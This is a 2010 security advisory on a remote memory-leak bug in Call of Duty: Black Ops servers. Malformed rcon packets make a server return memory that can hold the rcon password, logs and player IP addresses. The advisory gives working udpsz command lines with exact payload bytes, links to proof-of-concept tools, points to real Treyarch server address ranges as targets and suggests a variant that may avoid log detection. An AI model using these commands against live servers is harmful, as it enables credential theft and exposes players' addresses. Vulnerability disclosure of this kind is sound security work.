####################################################################### Luigi Auriemma Application: Call of Duty: Black Ops http://www.callofduty.com Versions: unknown, refer to the release date of this advisory Platforms: unknown (it should be Windows) Bug: memory leak Exploitation: remote, versus server Date: 18 Nov 2010 Author: Luigi Auriemma e-mail: aluigi@autistici.org web: aluigi.org ####################################################################### 1) Introduction 2) Bug 3) The Code 4) Fix ####################################################################### =============== 1) Introduction =============== Call of Duty Black Ops (cod7) is the new game of the CoD series. Just like cod6 also this one is distribuited as "client-only", which means that a normal user cannot host a server. Only some hosting companies (GameServers) or the same Treyarch can host dedicated servers. ####################################################################### ====== 2) Bug ====== When the server receives an rcon packet (opcode 0x00) it replies with a packet having a fixed size of 1168 bytes, doesn't matter if its content is smaller. The result is that various parts of the server's memory are disclosed remotely to anyone and through the continuous sending of these invalid rcon packets is possible to monitor the server and maybe retrieving important informations like the value of cvars (included rcon password), parts of the logs (included the output of previous rcon packets of the admin), parts of the server's configuration and the IP addresses of the other players. ####################################################################### =========== 3) The Code =========== http://aluigi.org/testz/udpsz.zip http://aluigi.org/poc/cod7mem.zip udpsz -C "ffffffff 00 0000000000000000" -D SERVER 3074 -1 or with the filter for easier visualization and monitoring: udpsz -q -l 1000 -C "ffffffff 00 0000000000000000" -D -L cod7mem.dll SERVER 3074 -1 for example the Treyarch servers are available in a certain range that covers different C classes like 173.199.77.x, 173.199.78.x, 173.199.79.x and so on. it's possible to use "ffffffff 00 6100000000000000" for receiving a reply string shorter than 50 bytes and so more memory visible but I don't know if it will appear in the server's logs because it could be considered a password guessing attack. ####################################################################### ====== 4) Fix ====== No fix. #######################################################################